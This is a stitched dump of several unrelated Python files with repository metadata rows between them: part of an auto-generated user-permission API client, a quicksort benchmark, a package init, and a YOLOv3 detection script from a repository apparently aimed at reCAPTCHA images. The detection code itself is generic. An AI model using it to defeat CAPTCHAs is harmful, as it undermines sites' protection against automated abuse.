raise ValueError("Missing the required parameter `id` when calling `get_user_business_functions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}/businessFunctions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def grant_permission_to_users(self, permission, **kwargs): # noqa: E501
"""Grants a specific permission to multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.grant_permission_to_users(permission, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str permission: Permission to grant to the users. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission (required)
:param list[str] body: List of users which should be granted by specified permission
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.grant_permission_to_users_with_http_info(permission, **kwargs) # noqa: E501
else:
(data) = self.grant_permission_to_users_with_http_info(permission, **kwargs) # noqa: E501
return data
def grant_permission_to_users_with_http_info(self, permission, **kwargs): # noqa: E501
"""Grants a specific permission to multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.grant_permission_to_users_with_http_info(permission, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str permission: Permission to grant to the users. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission (required)
:param list[str] body: List of users which should be granted by specified permission
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['permission', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method grant_permission_to_users" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'permission' is set
if self.api_client.client_side_validation and ('permission' not in params or
params['permission'] is None): # noqa: E501
raise ValueError("Missing the required parameter `permission` when calling `grant_permission_to_users`") # noqa: E501
collection_formats = {}
path_params = {}
if 'permission' in params:
path_params['permission'] = params['permission'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/grant/{permission}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def grant_user_permission(self, id, **kwargs): # noqa: E501
"""Grants a specific permission to user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.grant_user_permission(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param str group: Permission group to grant to the account. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.grant_user_permission_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.grant_user_permission_with_http_info(id, **kwargs) # noqa: E501
return data
def grant_user_permission_with_http_info(self, id, **kwargs): # noqa: E501
"""Grants a specific permission to user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.grant_user_permission_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param str group: Permission group to grant to the account. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'group'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method grant_user_permission" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `grant_user_permission`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'group' in params:
form_params.append(('group', params['group'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}/grant', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def invite_users(self, **kwargs): # noqa: E501
"""Invite users with given user groups and permissions. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.invite_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[UserToCreate] body: Example Body: <pre>[ { \"emailAddress\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] } ]</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.invite_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.invite_users_with_http_info(**kwargs) # noqa: E501
return data
def invite_users_with_http_info(self, **kwargs): # noqa: E501
"""Invite users with given user groups and permissions. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.invite_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[UserToCreate] body: Example Body: <pre>[ { \"emailAddress\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] } ]</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method invite_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/invite', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_user_from_user_groups(self, id, **kwargs): # noqa: E501
"""Removes specific groups from the user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_user_from_user_groups(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: The list of groups that should be removed from the account
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remove_user_from_user_groups_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.remove_user_from_user_groups_with_http_info(id, **kwargs) # noqa: E501
return data
def remove_user_from_user_groups_with_http_info(self, id, **kwargs): # noqa: E501
"""Removes specific groups from the user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_user_from_user_groups_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: The list of groups that should be removed from the account
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_user_from_user_groups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `remove_user_from_user_groups`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}/removeUserGroups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def revoke_permission_from_users(self, permission, **kwargs): # noqa: E501
"""Revokes a specific permission from multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.revoke_permission_from_users(permission, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str permission: Permission to revoke from the accounts. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission (required)
:param list[str] body: List of users or service accounts which should be revoked by specified permission
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.revoke_permission_from_users_with_http_info(permission, **kwargs) # noqa: E501
else:
(data) = self.revoke_permission_from_users_with_http_info(permission, **kwargs) # noqa: E501
return data
def revoke_permission_from_users_with_http_info(self, permission, **kwargs): # noqa: E501
"""Revokes a specific permission from multiple users or service accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.revoke_permission_from_users_with_http_info(permission, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str permission: Permission to revoke from the accounts. Please note that 'host_tag_management' is the equivalent of the 'Source Tag Management' permission (required)
:param list[str] body: List of users or service accounts which should be revoked by specified permission
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['permission', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method revoke_permission_from_users" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'permission' is set
if self.api_client.client_side_validation and ('permission' not in params or
params['permission'] is None): # noqa: E501
raise ValueError("Missing the required parameter `permission` when calling `revoke_permission_from_users`") # noqa: E501
collection_formats = {}
path_params = {}
if 'permission' in params:
path_params['permission'] = params['permission'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/revoke/{permission}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def revoke_user_permission(self, id, **kwargs): # noqa: E501
"""Revokes a specific permission from user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.revoke_user_permission(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param str group:
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.revoke_user_permission_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.revoke_user_permission_with_http_info(id, **kwargs) # noqa: E501
return data
def revoke_user_permission_with_http_info(self, id, **kwargs): # noqa: E501
"""Revokes a specific permission from user or service account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.revoke_user_permission_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param str group:
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'group'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method revoke_user_permission" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `revoke_user_permission`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'group' in params:
form_params.append(('group', params['group'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}/revoke', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_user(self, id, **kwargs): # noqa: E501
"""Update user with given user groups, permissions and ingestion policy. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param UserRequestDTO body: Example Body: <pre>{ \"identifier\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] }</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_user_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.update_user_with_http_info(id, **kwargs) # noqa: E501
return data
def update_user_with_http_info(self, id, **kwargs): # noqa: E501
"""Update user with given user groups, permissions and ingestion policy. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param UserRequestDTO body: Example Body: <pre>{ \"identifier\": \"user@example.com\", \"groups\": [ \"user_management\" ], \"userGroups\": [ \"8b23136b-ecd2-4cb5-8c92-62477dcc4090\" ], \"ingestionPolicyId\": \"ingestionPolicyId\", \"roles\": [ \"Role\" ] }</pre>
:return: UserModel
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `update_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserModel', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def validate_users(self, **kwargs): # noqa: E501
"""Returns valid users and service accounts, also invalid identifiers from the given list # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] body:
:return: ResponseContainerValidatedUsersDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.validate_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.validate_users_with_http_info(**kwargs) # noqa: E501
return data
def validate_users_with_http_info(self, **kwargs): # noqa: E501
"""Returns valid users and service accounts, also invalid identifiers from the given list # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] body:
:return: ResponseContainerValidatedUsersDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method validate_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/user/validateUsers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerValidatedUsersDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.154101
| 409
| 0.599196
| 6,928
| 60,713
| 5.01097
| 0.038539
| 0.054384
| 0.024196
| 0.03111
| 0.965981
| 0.961977
| 0.960393
| 0.954171
| 0.951089
| 0.945241
| 0
| 0.020326
| 0.306359
| 60,713
| 1,511
| 410
| 40.180675
| 0.804027
| 0.349085
| 0
| 0.837037
| 0
| 0
| 0.167362
| 0.048631
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038272
| false
| 0
| 0.004938
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d26d9c4a809fe7cebec535a3000886981482ce5a
| 3,041
|
py
|
Python
|
src/quicksort.py
|
endere/Data-structures
|
2eb522406c348b6ca26c47f8790b77088cc8cae5
|
[
"MIT"
] | 1
|
2017-06-19T22:35:34.000Z
|
2017-06-19T22:35:34.000Z
|
src/quicksort.py
|
endere/Data-structures
|
2eb522406c348b6ca26c47f8790b77088cc8cae5
|
[
"MIT"
] | 1
|
2017-07-13T00:53:06.000Z
|
2017-07-13T00:53:06.000Z
|
src/quicksort.py
|
endere/Data-structures-2nd-half
|
2eb522406c348b6ca26c47f8790b77088cc8cae5
|
[
"MIT"
] | null | null | null |
"""Quick Sort Data Structure."""
def quick_sort(array):
"""."""
if len(array) == 1:
if not isinstance(array[0], int):
raise TypeError('Must be an integer, please try again.')
return array
if len(array) == 0:
return array
pivot_point = array[0]
stored_index = 0
for i in range(len(array)):
if not isinstance(array[i], int):
raise TypeError('Must be an integer, please try again.')
if pivot_point > array[i]:
stored_index += 1
array[stored_index], array[i] = array[i], array[stored_index]
array[stored_index], array[0] = array[0], array[stored_index]
return quick_sort(array[:stored_index]) + [array[stored_index]] + quick_sort(array[stored_index + 1:])
if __name__ == '__main__': # pragma no cover
import random
import datetime
from functools import reduce
times = []
num_runs = 500
string_length = 5
for i in range(num_runs):
data = random.sample(range(string_length), string_length)
timeA = datetime.datetime.now()
quick_sort(data)
timeB = datetime.datetime.now()
times.append(timeB - timeA)
average_time = reduce(lambda x, y: x + y, times) / len(times)
print(' ')
print('Best Case: Shuffled')
print('Number of runs: ', num_runs)
print('Length of lists to sort: ', string_length)
print('Average time: ', str(average_time)[-8:], 'seconds')
string_length = 100
for i in range(num_runs):
data = random.sample(range(string_length), string_length)
timeA = datetime.datetime.now()
quick_sort(data)
timeB = datetime.datetime.now()
times.append(timeB - timeA)
average_time = reduce(lambda x, y: x + y, times) / len(times)
print(' ')
print('Best Case: Shuffled')
print('Number of runs: ', num_runs)
print('Length of lists to sort: ', string_length)
print('Average time: ', str(average_time)[-8:], 'seconds')
string_length = 5
for i in range(num_runs):
data = [i for i in range(string_length)][::-1]
timeA = datetime.datetime.now()
quick_sort(data)
timeB = datetime.datetime.now()
times.append(timeB - timeA)
average_time = reduce(lambda x, y: x + y, times) / len(times)
print(' ')
print('Worst Case: Reverse order')
print('Number of runs: ', num_runs)
print('Length of lists to sort: ', string_length)
print('Average time: ', str(average_time)[-8:], 'seconds')
string_length = 100
for i in range(num_runs):
data = [i for i in range(string_length)][::-1]
timeA = datetime.datetime.now()
quick_sort(data)
timeB = datetime.datetime.now()
times.append(timeB - timeA)
average_time = reduce(lambda x, y: x + y, times) / len(times)
print(' ')
print('Worst Case: Reverse order')
print('Number of runs: ', num_runs)
print('Length of lists to sort: ', string_length)
print('Average time: ', str(average_time)[-8:], 'seconds')
| 37.085366
| 106
| 0.615258
| 408
| 3,041
| 4.446078
| 0.181373
| 0.092613
| 0.083793
| 0.042448
| 0.804851
| 0.786108
| 0.750827
| 0.750827
| 0.750827
| 0.750827
| 0
| 0.011384
| 0.248931
| 3,041
| 81
| 107
| 37.54321
| 0.782837
| 0.014798
| 0
| 0.746667
| 0
| 0
| 0.141374
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013333
| false
| 0
| 0.04
| 0
| 0.093333
| 0.266667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d273afb46d72bd26daa615f61ad7e7f3ef48d942
| 192
|
py
|
Python
|
riglib/hdfwriter/__init__.py
|
DerekYJC/bmi_python
|
7b9cf3f294a33688db24b0863c1035e9cc6999ea
|
[
"Apache-2.0"
] | null | null | null |
riglib/hdfwriter/__init__.py
|
DerekYJC/bmi_python
|
7b9cf3f294a33688db24b0863c1035e9cc6999ea
|
[
"Apache-2.0"
] | 12
|
2020-07-31T18:58:31.000Z
|
2022-02-10T14:36:00.000Z
|
riglib/hdfwriter/__init__.py
|
DerekYJC/bmi_python
|
7b9cf3f294a33688db24b0863c1035e9cc6999ea
|
[
"Apache-2.0"
] | 4
|
2020-03-06T15:39:00.000Z
|
2021-05-26T17:03:21.000Z
|
# This is the __init__.py file if you are using the HDFWriter from
# riglib, without doing its own setup.
from .hdfwriter.hdfwriter import MsgTable
from .hdfwriter.hdfwriter import HDFWriter
| 38.4
| 66
| 0.802083
| 29
| 192
| 5.172414
| 0.689655
| 0.173333
| 0.293333
| 0.373333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151042
| 192
| 4
| 67
| 48
| 0.920245
| 0.526042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9629bdc6dd6436a851d69554fbb7d3652b34ac09
| 26,472
|
py
|
Python
|
plotting.py
|
brfkorucu/Gridding-Recaptcha-Photo
|
8641ed44913a5cfed925fe1e4851a8310f7798db
|
[
"MIT"
] | 2
|
2021-11-07T16:30:22.000Z
|
2022-03-11T16:44:34.000Z
|
plotting.py
|
brfkorucu/Gridding-Recaptcha-Photo
|
8641ed44913a5cfed925fe1e4851a8310f7798db
|
[
"MIT"
] | 1
|
2022-03-11T16:54:55.000Z
|
2022-03-11T18:05:21.000Z
|
plotting.py
|
brfkorucu/Gridding-Recaptcha-Photo
|
8641ed44913a5cfed925fe1e4851a8310f7798db
|
[
"MIT"
] | null | null | null |
################################################################################################
import cv2
import numpy as np
import time
import sys
import os
import optparse
################################################################################################
parser = optparse.OptionParser("usage%prog " + "-p <name of jpg's>")
parser.add_option("-p", dest="path_name", type="str", help="specify jpg path")
options, args = parser.parse_args()
path_name = options.path_name
if path_name == None:
print(parser.usage)
exit(0)
################################################################################################
CONFIDENCE = 0.2
SCORE_THRESHOLD = 0.2
IOU_THRESHOLD = 0.2
config_path = "cfg/yolov3.cfg"
weights_path = "cfg/yolov3.weights"
labels = open("cfg/coco.names").read().strip().split("\n")
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
image = cv2.imread(path_name)
file_name = os.path.basename(path_name)
filename, ext = file_name.split(".")
h, w = image.shape[:2]
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
#print("image.shape:", image.shape)
#print("blob.shape:", blob.shape)
net.setInput(blob)
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print(f"\nTime took: {time_took:.2f}s")
boxes, confidences, class_ids = [], [], []
for output in layer_outputs:
for detection in output:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > CONFIDENCE:
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
#print(detection.shape)
